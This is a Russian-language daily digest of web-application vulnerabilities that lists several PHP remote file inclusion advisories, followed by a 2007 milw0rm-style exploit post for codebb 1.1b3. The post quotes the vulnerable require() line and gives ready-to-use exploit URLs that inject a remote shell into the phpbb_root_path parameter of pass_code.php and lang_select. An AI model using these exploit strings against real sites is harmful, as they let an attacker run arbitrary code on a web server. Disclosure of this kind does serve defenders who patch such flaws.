Дополнительная информация

Ежедневная сводка ошибок в Web-приложениях (PHP, ASP, JSP, CGI, Perl )

Eve-NukePortal file include (phpbb_root_path)

MangoBery CMS 0.5.5 (quotes.php) Remote File Inclusion Vulnerability

Kaqoo Auction (install_root) Multiple Remote File Include Vulnerabilities

JC URLshrink 1.3.1 Remote Code Execution Vulnerability

From:	Alkomandoz Hacker <alkomandoz-hacker_(at)_hotmail.com>
Date:	2 апреля 2007 г.
Subject:	codebb 1.1b3 (phpbb_root_path )Remote File Include Vulnerability

# codebb 1.1b3  (phpbb_root_path )Remote File Include Vulnerability

# D.Script: http://rd.cycnus.de/download/codebb-1.1b3.tar.bz2

# Discovered by: Alkomandoz Hacker

# Homepage: http://www.asb-may.net
# V.Code

# include_once($phpbb_root_path . 'includes/codebb/config.'.$phpEx);

require($phpbb_root_path . 'includes/codebb/scanners/scannerlist.'.$phpEx);



# Exploit:[Path]/codebb/pass_code.php?phpbb_root_path=SheLL

   [Path]/codebb/lang_select?phpbb_root_path=SheLL


# Greetz To: A-s-T Team & AsbMay's Group & KaBaRa & Mahmood_Ali & ThE-DE@TH & ToOoFa

# Thanx: asb-may.net & TrYaG.CoM

# milw0rm.com [2007-03-28]